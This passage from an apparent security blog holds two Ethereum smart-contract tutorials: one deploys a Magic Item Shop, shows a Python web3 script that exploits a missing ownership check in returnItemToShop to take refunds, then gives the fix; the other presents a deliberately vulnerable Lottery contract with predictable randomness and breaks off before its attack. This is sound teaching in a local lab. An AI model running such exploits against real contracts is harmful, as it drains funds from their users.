      rarity: &quot;Legendary&quot;,
      price: hre.ethers.parseEther(&quot;5&quot;),
    },
  ];

  // Loop through each item and add it to the shop
  for (const item of items) {
    const tx = await shop.addItem(item.name, item.rarity, item.price);
    await tx.wait();
    console.log(
      `Added item: ${item.name} - Rarity: ${
        item.rarity
      } - Price: ${hre.ethers.formatEther(item.price)} ETH`
    );
  }

  console.log(&quot;Shop initialized with items!&quot;);
}

// Run the deployment and initialization script
main().catch((error) =&gt; {
  console.error(error);
  process.exitCode = 1;
});


```
&lt;/details&gt;


Let’s break down how it works.

The script starts by importing Hardhat’s runtime environment (`hre`) and the `ethers` library. Hardhat helps manage the whole process of deploying and testing contracts, while `ethers` gives us tools for interacting with the Ethereum blockchain. Here’s what that setup looks like:

```js
// Import Hardhat Runtime Environment and ethers
const hre = require(&quot;hardhat&quot;);

```

Next, we define an asynchronous function called `main()` that handles the deployment and setup steps. Inside `main()`, we first get the contract factory for `MagicItemShop`, which is like a blueprint that lets us deploy a new instance of the contract. To actually deploy it, we call `MagicItemShop.deploy()`, which sends the contract code to the blockchain. We then wait for the deployment to complete with `shop.waitForDeployment()`, and once it’s done, we log the contract’s address to confirm everything went smoothly.

```js
async function main() {
  // Get the contract factory and deploy the MagicItemShop contract
  const MagicItemShop = await hre.ethers.getContractFactory(&quot;MagicItemShop&quot;);
  const shop = await MagicItemShop.deploy();
  await shop.waitForDeployment();

  console.log(&quot;MagicItemShop deployed to:&quot;, shop.target);

```

With the contract deployed, the next part of the script defines a set of magical items to add to the shop. We create an array called `items`, where each entry is an item with a `name`, `rarity`, and `price`. The prices are set in Ether, and we use `hre.ethers.parseEther` to convert these amounts to Wei (the smallest unit of Ether) so they’re ready for the blockchain. This initial inventory makes sure the shop has items ready for users as soon as the contract is live.

```js
  // Define items to add to the shop
  const items = [
    {
      name: &quot;Sword of Flames&quot;,
      rarity: &quot;Rare&quot;,
      price: hre.ethers.parseEther(&quot;1&quot;),
    },
    {
      name: &quot;Shield of Light&quot;,
      rarity: &quot;Uncommon&quot;,
      price: hre.ethers.parseEther(&quot;0.5&quot;),
    },
    {
      name: &quot;Staff of Wisdom&quot;,
      rarity: &quot;Epic&quot;,
      price: hre.ethers.parseEther(&quot;2&quot;),
    },
    {
      name: &quot;Potion of Healing&quot;,
      rarity: &quot;Common&quot;,
      price: hre.ethers.parseEther(&quot;0.1&quot;),
    },
    {
      name: &quot;Ring of Invisibility&quot;,
      rarity: &quot;Legendary&quot;,
      price: hre.ethers.parseEther(&quot;5&quot;),
    },
  ];

```
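
As a quick sanity check on that conversion, here is a hypothetical Python equivalent of `parseEther`. The `parse_ether` helper below is illustrative, not part of ethers or web3.py:

```python
from decimal import Decimal

WEI_PER_ETHER = 10 ** 18  # 1 Ether equals 10^18 wei

def parse_ether(amount):
    # Accept an int, float, or numeric string and return the value in wei.
    # Decimal avoids the precision loss that float multiplication would cause.
    return int(Decimal(str(amount)) * WEI_PER_ETHER)
```

For example, `parse_ether(0.5)` returns `500000000000000000` wei, the Shield of Light price from the list above.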

After defining the items, the script loops through each item in the array and calls the `addItem` function on the contract to add it to the shop. We use `await` here to ensure each item is added one at a time, and `tx.wait()` to wait for each transaction to complete before moving to the next item. As each item is added, the script logs its name, rarity, and price in Ether so we can keep track of what’s been initialized.

```js
  // Loop through each item and add it to the shop
  for (const item of items) {
    const tx = await shop.addItem(item.name, item.rarity, item.price);
    await tx.wait();
    console.log(
      `Added item: ${item.name} - Rarity: ${
        item.rarity
      } - Price: ${hre.ethers.formatEther(item.price)} ETH`
    );
  }

  console.log(&quot;Shop initialized with items!&quot;);
}

```

Finally, we include a `main().catch(...)` line to handle any errors that might pop up during deployment. If something goes wrong, this line will catch the error, print it to the console, and set the exit code to `1` (indicating a failure), which can be helpful for debugging.

```js
// Run the deployment and initialization script
main().catch((error) =&gt; {
  console.error(error);
  process.exitCode = 1;
});

```

![](/content/images/2024/11/image-6.png)

Running the deployment script

# Introduction to the Attack

Now that we’ve deployed our Magic Item Shop contract and stocked it with a selection of magical items, we’re ready to examine a vulnerability lurking within. The shop is designed to offer users flexibility, allowing them to buy, gift, and even return items for a partial refund. But while these features provide a smooth user experience, there’s a hidden flaw in the `returnItemToShop` function that an attacker can abuse.

Normally, we’d expect that only the true owner of an item could return it to the shop and receive a refund. However, the current contract doesn’t actually check that the caller owns the item they’re trying to return. This oversight opens the door to an exploit where someone could “return” high-value items they don’t own and repeatedly claim refunds, potentially draining funds from the shop.

To understand how this might unfold, we’ll start by simulating some regular user activity. We’ll have a few different accounts make legitimate purchases to populate the shop with items that are now user-owned. This will help illustrate the normal flow of the contract and give us a realistic starting point before we look into how the exploit works.

After we’ve set up these purchases, we’ll dive into the exploit itself and see exactly how this lack of ownership verification can be used to take advantage of the refund mechanism. Let’s begin with the script to simulate user purchases in our shop.

## Simulating User Purchases

Before diving into any potential exploit, it’s helpful to see the contract in action through normal user behavior. Here, we’re simulating a few different users purchasing items from the shop. This gives us a sense of how the contract operates in a typical scenario and sets up some items as owned by individual users rather than the shop.

&lt;details&gt;
&lt;summary&gt;Simulating User Purchases Code&lt;/summary&gt;

```python
from web3 import Web3
import json

# Connect to the Ethereum network (e.g., Ganache or testnet)
w3 = Web3(Web3.HTTPProvider(&quot;http://127.0.0.1:7545&quot;))  # Replace with your network URL

# Replace with the deployed contract address
contract_address = &quot;0xf223CA80ec911fcf19e34c252f1180De4A718368&quot;

# Open the ABI file
with open(&quot;MagicItemShop.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize the contract
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

accounts = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;, &quot;item_id&quot;: 0},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;, &quot;item_id&quot;: 1},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;, &quot;item_id&quot;: 2},
]

# Function to simulate purchases by different accounts
def simulate_purchases():
    for account in accounts:
        # Retrieve the item details to get the price
        item = contract.functions.items(account[&quot;item_id&quot;]).call()
        price = item[3]  # Price is the fourth item in the returned tuple

        # Build the transaction to purchase the item
        tx = contract.functions.purchaseItem(account[&quot;item_id&quot;]).build_transaction({
            &apos;from&apos;: account[&quot;address&quot;],
            &apos;value&apos;: price,
            &apos;nonce&apos;: w3.eth.get_transaction_count(account[&quot;address&quot;]),
            &apos;gas&apos;: 200000,
            &apos;gasPrice&apos;: w3.to_wei(&apos;50&apos;, &apos;gwei&apos;)
        })

        # Sign the transaction with the account&apos;s private key
        signed_tx = w3.eth.account.sign_transaction(tx, account[&quot;private_key&quot;])

        # Send the transaction to the network
        tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)

        # Wait for the transaction receipt to confirm it
        tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)

        # Check if the purchase was successful
        if tx_receipt.status == 1:
            print(f&quot;Account {account[&apos;address&apos;]} successfully purchased item {account[&apos;item_id&apos;]}&quot;)
        else:
            print(f&quot;Account {account[&apos;address&apos;]} failed to purchase item {account[&apos;item_id&apos;]}&quot;)

# Run the simulation
simulate_purchases()


```
&lt;/details&gt;


In this simulation, we have three different accounts, each buying a specific item from the shop. Each account is represented by an Ethereum address and a private key. This setup allows us to simulate individual users making purchases, where each user buys an item and becomes its new owner.

Let’s walk through the code step-by-step to see how it works.

#### Setting Up the Connection and Contract

We begin by setting up the connection to the Ethereum network and loading the deployed contract. Here, we specify the network address (in this case, Ganache or another test network) and provide the contract address so that we can interact with it. We also load the contract’s ABI (Application Binary Interface) to ensure our script knows the structure of the contract and its available functions.

```python
from web3 import Web3
import json

# Connect to the Ethereum network (e.g., Ganache or testnet)
w3 = Web3(Web3.HTTPProvider(&quot;http://127.0.0.1:7545&quot;))  # Replace with your network URL

# Replace with the deployed contract address
contract_address = &quot;0xf223CA80ec911fcf19e34c252f1180De4A718368&quot;

# Open the ABI file
with open(&quot;MagicItemShop.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize the contract instance
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

```

#### Defining the Accounts and Target Items

Next, we define a list of accounts. Each account is associated with an Ethereum address, a private key, and an item ID for the item they will purchase. This setup allows us to simulate different users, each buying a unique item from the shop. Here’s how the accounts are defined:

```python
accounts = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;, &quot;item_id&quot;: 0},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;, &quot;item_id&quot;: 1},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;, &quot;item_id&quot;: 2},
]

```

#### Simulating the Purchases

The core of the simulation happens in the `simulate_purchases` function. This function loops through each account in the `accounts` list, retrieves the item’s price, builds a transaction to purchase the item, signs it with the account’s private key, and sends it to the network. Let’s break it down:

1.  **Retrieve Item Price**: For each account, we first call the `items` function on the contract to get details about the item, including its price. The price is essential, as we need to send the correct amount of Ether to make the purchase.

```python
item = contract.functions.items(account[&quot;item_id&quot;]).call()
price = item[3]  # Price is the fourth item in the returned tuple

```

2.  **Build and Sign the Transaction**: Once we have the item’s price, we build the transaction to call `purchaseItem` with the item ID. We include the Ether value in `value`, as well as the sender’s address and gas details. After building the transaction, we sign it using the account’s private key.

```python
tx = contract.functions.purchaseItem(account[&quot;item_id&quot;]).build_transaction({
    &apos;from&apos;: account[&quot;address&quot;],
    &apos;value&apos;: price,
    &apos;nonce&apos;: w3.eth.get_transaction_count(account[&quot;address&quot;]),
    &apos;gas&apos;: 200000,
    &apos;gasPrice&apos;: w3.to_wei(&apos;50&apos;, &apos;gwei&apos;)
})

signed_tx = w3.eth.account.sign_transaction(tx, account[&quot;private_key&quot;])

```

3.  **Send the Transaction and Wait for Confirmation**: With the transaction signed, we send it to the network and wait for a receipt to confirm that it was mined successfully. If the status in the receipt is `1`, the purchase was successful; otherwise, it failed.

```python
tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)

# Check if the purchase was successful
if tx_receipt.status == 1:
    print(f&quot;Account {account[&apos;address&apos;]} successfully purchased item {account[&apos;item_id&apos;]}&quot;)
else:
    print(f&quot;Account {account[&apos;address&apos;]} failed to purchase item {account[&apos;item_id&apos;]}&quot;)

```
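
The positional indexing in step 1 (price as `item[3]`) is fragile if the struct ever changes. One hypothetical way to make the fields explicit, assuming the same struct order (`id`, `name`, `rarity`, `price`, `currentOwner`), is a small wrapper:

```python
from dataclasses import dataclass

@dataclass
class Item:
    # Field order matches the Solidity struct returned by the items getter
    id: int
    name: str
    rarity: str
    price: int
    current_owner: str

def item_from_tuple(raw):
    # raw is the 5-tuple returned by contract.functions.items(i).call()
    return Item(*raw)
```

With this in place, `item_from_tuple(item).price` replaces the bare `item[3]`.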

#### Running the Simulation

Finally, we call `simulate_purchases()` to execute the function. Each account will attempt to buy its designated item, and if all goes well, we’ll see a success message for each purchase, showing that the items now have new owners.

![](/content/images/2024/11/image-7.png)

Purchasing items from the shop

## Exploiting the Vulnerability: Taking Advantage of Unchecked Access in `returnItemToShop`

Now that we’ve set up the shop with items owned by different users, it’s time to explore how an attacker could exploit the `returnItemToShop` function to drain funds from the contract. Due to the lack of ownership checks in this function, the attacker can trigger returns on any item, even ones they don’t actually own. This allows them to claim partial refunds on high-value items repeatedly, despite never purchasing them. Let’s walk through the code used to execute this exploit.

### Setting Up the Dependencies and Connection

First, we set up the necessary dependencies and establish a connection to the Ethereum network. The code also verifies the connection to make sure we’re properly connected before proceeding with the exploit.

```python
# %% Dependencies
from web3 import Web3
import json
import time  # To add delay between transactions if needed

# Connect to the Ethereum network (e.g., local Ganache or testnet)
w3 = Web3(Web3.HTTPProvider(&quot;http://127.0.0.1:7545&quot;))  # Replace with your network URL

# Verify the connection
print(&quot;Is connected:&quot;, w3.is_connected())


```

### Loading the Contract and Setting Up Attacker Details

Next, we load the contract and initialize the necessary details for the attacker. We provide the contract’s address, the attacker’s address, and their private key, which will allow us to sign transactions as if we were the attacker. We then load the contract ABI from the JSON artifact, so that we can interact with its functions programmatically.

```python
# %% Contract

# Replace with the deployed contract address and attacker details
contract_address = &quot;0xf223CA80ec911fcf19e34c252f1180De4A718368&quot;
attacker_address = &quot;0xa7E1Dce14Bb439e6710c18e05C0DA71EAd3d0203&quot;
private_key = &quot;0x85ebe111f9cd1878845c72b10affa75fcbf300123a70c79f01cfbf65cdcd4b50&quot;  # Attacker&apos;s private key

# Load the contract ABI from the JSON artifact
with open(&quot;MagicItemShop.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize the contract instance
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

# Verify contract initialization
print(&quot;Contract initialized at address:&quot;, contract.address)


```

### Choosing the Item to Exploit

In this part, we choose a high-value item to target for the exploit. We retrieve the item’s details from the contract, including its price, which will allow us to calculate the refund amount. In this case, we’re choosing `item_id = 1` for demonstration purposes.

```python
# %% Choose the item id to exploit

# Define the item ID the attacker wants to exploit
item_id = 1  # Replace with the ID of a valuable item

# Retrieve item details to confirm
item = contract.functions.items(item_id).call()
print(&quot;Item details:&quot;, item)

# Extract price and calculate refund amount
price = item[3]  # Price is the fourth item in the returned tuple
refund_amount = price // 2  # Refund is half the item&apos;s price
print(f&quot;Price: {price} wei, Refund amount: {refund_amount} wei&quot;)

```

![](/content/images/2024/11/image-12.png)

Choosing the target

### Building and Sending the Exploit Transaction

Now we’re ready to launch the exploit. We build a transaction to call the `returnItemToShop` function on the targeted item. The transaction includes the attacker’s address and a gas limit high enough for the call to execute. After building the transaction, we sign it with the attacker’s private key and send it to the network.

```python
# %% Transaction

# Build the transaction to call returnItemToShop on the targeted item
tx = contract.functions.returnItemToShop(item_id).build_transaction({
    &apos;from&apos;: attacker_address,
    &apos;nonce&apos;: w3.eth.get_transaction_count(attacker_address),
    &apos;gas&apos;: 100000,
    &apos;gasPrice&apos;: w3.to_wei(&apos;50&apos;, &apos;gwei&apos;)
})

# Sign the transaction
signed_tx = w3.eth.account.sign_transaction(tx, private_key)

# Send the transaction to the network
tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)

print(&quot;Transaction sent! Hash:&quot;, tx_hash.hex())

```

#### Checking the Transaction Receipt

After sending the transaction, we check the transaction receipt to confirm whether the exploit was successful. If `tx_receipt.status` is `1`, the transaction was mined successfully and the attacker received the refund amount for the item.

![](/content/images/2024/11/image-10.png)

Amount of Ether held by the attacker before running the exploit

![](/content/images/2024/11/image-13.png)

Results after running the exploit

![](/content/images/2024/11/image-11.png)

Amount of Ether held by the attacker after running the exploit

# Fixing the Vulnerability: Adding Ownership Verification

Now that we’ve seen how the lack of access control in `returnItemToShop` opens up the contract to exploitation, let’s look at how we can fix it. The vulnerability stems from the fact that anyone can call `returnItemToShop` on any item, regardless of whether they own it. This oversight allows unauthorized users to repeatedly claim refunds for items they don’t actually own, which can drain the contract’s funds over time.

To fix this issue, we need to add a check in `returnItemToShop` to ensure that only the legitimate owner of an item can return it for a refund. By verifying the caller’s address (`msg.sender`) against the `currentOwner` of the item, we can restrict refunds to the true owner, closing off the possibility of unauthorized refunds.

#### Implementing the Fix

The fix involves adding a single line of code to the `returnItemToShop` function that checks if the caller is the item’s current owner. If `msg.sender` (the caller) doesn’t match `item.currentOwner`, the transaction will be reverted, preventing unauthorized returns.

Here’s how the updated function would look:

```solidity
function returnItemToShop(uint256 itemId) public {
    Item storage item = items[itemId];

    // **New check to confirm caller is the item&apos;s owner**
    require(item.currentOwner == msg.sender, &quot;Only the item owner can return it&quot;);

    // Refund is set to half of the original price
    uint256 refundAmount = item.price / 2;

    // Set the item ownership back to the shop
    item.currentOwner = shopAddress;
    payable(msg.sender).transfer(refundAmount);
}

```

#### How This Fix Works

With this new line, the contract first checks that `msg.sender` (the caller’s address) matches `item.currentOwner` before proceeding. If the caller isn’t the item’s current owner, the function call fails with the error message `&quot;Only the item owner can return it&quot;`. This verification ensures that only the true owner of the item can execute a return, preventing anyone else from accessing refunds they’re not entitled to.
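
The same kind of in-memory sketch shows the fix doing its job. In this hypothetical model, `return_item_fixed` raises for any caller other than the recorded owner, just as the new `require` reverts on chain:

```python
SHOP = object()  # sentinel standing in for shopAddress

def return_item_fixed(items, item_id, caller):
    price, owner = items[item_id]
    if owner is not caller:
        raise PermissionError   # Only the item owner can return it
    items[item_id][1] = SHOP    # the item goes back on the shelf
    return price // 2           # refund paid to the caller
```

A legitimate owner still receives the half-price refund; every other caller is rejected before any state changes.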

# Conclusions

In this article, we examined a common yet often overlooked vulnerability in smart contracts: insufficient access control. By dissecting the Magic Item Shop contract, we saw how a lack of ownership checks in the `returnItemToShop` function created an exploit pathway, allowing an attacker to repeatedly claim refunds on items they didn’t own. This type of vulnerability, though easy to miss, can result in severe consequences, especially in contracts handling assets or funds.

This example highlights the importance of strict access control in smart contract security. Anytime a function involves asset transfers, refunds, or ownership changes, it’s crucial to verify that only authorized users can perform these actions. Even basic checks—such as ensuring the caller is the item owner—can make a significant difference in preventing exploits.

Key takeaways for developers and pentesters include:

-   **Implement Ownership Verification**: Confirm that the caller is a legitimate owner or authorized user before allowing access to sensitive functions.
-   **Test for Edge Cases**: Beyond standard tests, simulate unauthorized access attempts, especially in functions that involve funds or asset management.
-   **Think Like an Attacker**: Anticipate how a malicious actor might exploit your contract, allowing you to identify and mitigate potential vulnerabilities proactively.

By applying these principles, developers and pentesters alike can better secure contracts and protect users from potential exploits. As smart contracts grow in popularity and manage larger assets, rigorous security practices have become essential.

# Resources

-   Hardhat - Ethereum Development Environment. &quot;Hardhat Documentation.&quot; Available at: [https://hardhat.org/getting-started/](https://hardhat.org/getting-started/)
-   Web3.py - A Python Library for Interacting with Ethereum. &quot;Web3.py Documentation.&quot; Available at: [https://web3py.readthedocs.io/](https://web3py.readthedocs.io/)
-   Ganache - Personal Blockchain for Ethereum Development. &quot;Ganache Documentation.&quot; Available at: [https://trufflesuite.com/ganache/](https://trufflesuite.com/ganache/)
-   Solidity - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   Solidity Security - Best Practices for Secure Smart Contracts. &quot;Solidity Documentation: Security Considerations.&quot; Available at: [https://docs.soliditylang.org/en/v0.8.0/security-considerations.html](https://docs.soliditylang.org/en/v0.8.0/security-considerations.html)</content:encoded><author>Ruben Santos</author></item><item><title>Exploiting Predictable Randomness in Ethereum Smart Contracts</title><link>https://www.kayssel.com/post/web3-2-lottery</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-2-lottery</guid><description>This chapter examines how attackers can exploit predictable randomness in a lottery contract, using Ganache to simulate the attack. It highlights the vulnerability of on-chain randomness and suggests secure solutions like Chainlink VRF.</description><pubDate>Sun, 10 Nov 2024 12:53:35 GMT</pubDate><content:encoded># Introduction

In the world of smart contracts, random number generation can be surprisingly challenging, particularly in public blockchains like Ethereum. When a smart contract attempts to generate randomness using values like the block number, timestamp, or other on-chain data, it can inadvertently expose itself to a vulnerability: **predictable outcomes**.

For example, in many lottery-style contracts, the winner might be determined based on the hash of a block combined with other known factors, such as the number of participants. While this approach may seem random, it’s actually far from it. Miners, or any user who can observe the chain, can potentially predict the outcome by manipulating the timing of transactions or repeatedly entering the lottery.

Here’s how it happens:

-   **Known Inputs**: Many contracts use predictable on-chain information—like the block number, timestamp, or total players—to calculate randomness. These values are accessible to everyone, making it possible to simulate future outcomes based on likely conditions.
-   **Miner Control**: Miners have the power to influence block properties like timestamps and can withhold blocks if it benefits them. This power gives them a potential edge to predict or even control a winner.
-   **Multi-Entry Manipulation**: In some cases, an attacker can increase their odds by joining the lottery multiple times. By carefully timing entries or controlling the number of participants, they could skew the winner selection to their advantage.

This article will dive into exactly how these vulnerabilities arise, why they pose a risk, and what makes true randomness so challenging to achieve in blockchain environments.

# The Vulnerable Contract

To demonstrate this vulnerability, we’ll use the following `Lottery` contract, which implements a straightforward approach to managing a lottery game on the blockchain. It allows users to join by purchasing tickets, after which the owner can select a winner who receives the entire balance of the contract.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Lottery {
    address public owner;
    address[] public players;
    uint public ticketPrice;
    address public winner; // State variable to store the winner&apos;s address

    constructor(uint _ticketPrice) {
        owner = msg.sender;
        ticketPrice = _ticketPrice;
    }

    // Allows users to buy tickets by sending exactly the ticket price
    function buyTicket() public payable {
        require(msg.value == ticketPrice, &quot;Invalid ticket price&quot;);
        players.push(msg.sender);
    }

    // Picks a winner based on a simple and predictable formula
    function pickWinner() public onlyOwner {
        require(players.length &gt; 0, &quot;No players have joined&quot;);

        // Calculate the winner index based on block number and players length
        uint winnerIndex = uint(
            keccak256(
                abi.encodePacked(
                    block.number, // Predictable block number
                    players.length // Known and controllable by the attacker
                )
            )
        ) % players.length;

        winner = players[winnerIndex]; // Store the winner address
        payable(winner).transfer(address(this).balance);

        // Reset the players array for the next round
        delete players;
    }

    // Returns the number of players
    function getPlayerCount() public view returns (uint) {
        return players.length;
    }

    // Returns the list of players (for testing purposes)
    function getPlayers() public view returns (address[] memory) {
        return players;
    }

    // Returns the winner&apos;s address
    function getWinner() public view returns (address) {
        return winner;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, &quot;Only the owner can call this function&quot;);
        _;
    }
}


```
&lt;/details&gt;


To start, the contract’s `constructor` is called with a ticket price specified in wei. This constructor sets the `owner` as the address that deployed the contract and stores the chosen `ticketPrice` for the lottery. Here’s the initialization code:

```solidity
constructor(uint _ticketPrice) {
    owner = msg.sender;
    ticketPrice = _ticketPrice;
}

```

With the owner and ticket price established, the contract proceeds to allow players to participate through the `buyTicket` function. This function requires users to send exactly the `ticketPrice` to confirm their participation. If they meet this requirement, their address is added to the `players` array:

```solidity
function buyTicket() public payable {
    require(msg.value == ticketPrice, &quot;Invalid ticket price&quot;);
    players.push(msg.sender);
}

```

This mechanism allows users to join the lottery as long as they send the correct ticket price in ether, automatically storing their address in `players`. As more users join, the `players` array grows, storing each participant&apos;s address and building up the contract balance from the ticket fees.

The winner selection process is handled by the `pickWinner` function, which only the contract owner can execute. This function first checks that there are participants in the lottery, ensuring that the lottery can only proceed if players have joined. If there are players, the function calculates the winner using a simple formula that determines an index in the `players` array. This `winnerIndex` is calculated based on the current block number and the length of the `players` array, as seen here:

```solidity
uint winnerIndex = uint(
    keccak256(
        abi.encodePacked(
            block.number, // Current block number
            players.length // Number of participants
        )
    )
) % players.length;


```

The calculated `winnerIndex` corresponds to an entry in the `players` array, selecting one of the addresses as the winner. The contract then transfers the entire balance to this winning address:

```solidity
winner = players[winnerIndex]; // Store the winner address
payable(winner).transfer(address(this).balance);

```

After transferring the balance to the winner, the `players` array is reset to clear all participants, preparing the contract for a new round of the lottery. This is done with the line:

```solidity
delete players;

```

The contract includes several view functions for users to monitor its state. For instance, `getPlayerCount` returns the current number of participants, while `getPlayers` provides a list of all addresses in `players`. There’s also a `getWinner` function to display the most recent winner:

```solidity
function getPlayerCount() public view returns (uint) {
    return players.length;
}

function getPlayers() public view returns (address[] memory) {
    return players;
}

function getWinner() public view returns (address) {
    return winner;
}

```

Finally, the contract ensures that only the owner can pick a winner by using a custom modifier, `onlyOwner`, which restricts the `pickWinner` function. This modifier checks that the caller is indeed the owner before allowing execution:

```solidity
modifier onlyOwner() {
    require(msg.sender == owner, &quot;Only the owner can call this function&quot;);
    _;
}

```

# The Attack Strategy

Here, since we’re using Ganache as our blockchain environment, we have complete control over block creation and transaction timing, which makes the attack much easier to carry out. With Ganache, we can advance blocks whenever we like and set ideal conditions for the exploit, allowing us to craft the perfect scenario for a successful outcome. This controlled setup is ideal for demonstrating the vulnerability in a straightforward way.

The exploit works by taking advantage of the lottery contract’s predictable winner selection. The contract calculates the winner based on two factors: the current block number and the number of participants. Both of these values are publicly accessible, so an attacker can time their entry or adjust the number of players to boost their chances of winning. By simulating different outcomes beforehand, they can pinpoint the best moment to join and dramatically increase their odds.

In a real-world setting, things would be more challenging. Block numbers are constantly updated by various miners, and the number of players can fluctuate, making it much harder to predict the right conditions. This simplified example with Ganache, however, lets us focus on the core vulnerability, showing exactly how an attacker could manipulate the system under ideal conditions.

## Deploying the contract

To set up the environment with Ganache and Hardhat, the process is essentially the same as in the [previous chapter](https://www.kayssel.com/post/web3-1/). Once Ganache is running and the Hardhat project is configured, we can use the following script to deploy the contract. This script leverages the `ethers` library to create an instance of the `Lottery` contract and sets a ticket price of 0.1 ether. Once deployed, it outputs the contract address to the console, allowing us to interact with the contract in our testing environment.

Here’s the deployment script:

```javascript
async function main() {
  const Lottery = await ethers.getContractFactory(&quot;Lottery&quot;);
  const ticketPrice = ethers.parseEther(&quot;0.1&quot;); // Ticket price in ether
  const lottery = await Lottery.deploy(ticketPrice);
  await lottery.waitForDeployment();

  console.log(&quot;Lottery deployed to:&quot;, lottery.target);
}

main()
  .then(() =&gt; process.exit(0))
  .catch((error) =&gt; {
    console.error(error);
    process.exit(1);
  });

```

Once the script is ready, you can deploy the contract on the local Ganache instance by running the following command with Hardhat:

```bash
npx hardhat run scripts/deploy.js --network ganache

```

## Adding users to the lottery

To interact with the contract, this time I chose Python over JavaScript. Python offers convenient tools like Jupyter notebooks, which allow interactive code execution and easier debugging, and many modern editors support this workflow. For example, I’m currently using Zed to run the code step by step, verifying that everything works as I go.

![](/content/images/2024/11/image.png)

Below is the Python script I used to automatically add participants to the lottery:

&lt;details&gt;
&lt;summary&gt;Script to add users to the lottery&lt;/summary&gt;

```python
# %% Cell 1
from web3 import Web3
import time
import json

# Connection setup
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

# %% Cell 2
# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

# %% Cell 3
# Replace these with actual Ganache accounts and private keys for testing
players = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;},
    {&quot;address&quot;: &quot;0x4154F4926135C31e8d9E88F83D8eaFe2749c4189&quot;, &quot;private_key&quot;: &quot;0xc4b5c6855187945c62f7148b3d1ad66ec23a8add6042ea64f27a46dff4d078f0&quot;}
]

# Set the ticket price in wei
ticket_price = web3.to_wei(0.1, &quot;ether&quot;)

# Loop to add each player to the lottery
for player in players:
    tx = lottery_contract.functions.buyTicket().build_transaction({
        &apos;from&apos;: player[&quot;address&quot;],
        &apos;value&apos;: ticket_price,
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
        &apos;nonce&apos;: web3.eth.get_transaction_count(player[&quot;address&quot;]),
    })

    # Sign the transaction with the player&apos;s private key
    signed_tx = web3.eth.account.sign_transaction(tx, player[&quot;private_key&quot;])
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    print(f&quot;Player {player[&apos;address&apos;]} joined the lottery.&quot;)

```
&lt;/details&gt;


Here&apos;s a brief explanation of the code (if you already have a rough idea of how it works, feel free to skip to the next section).

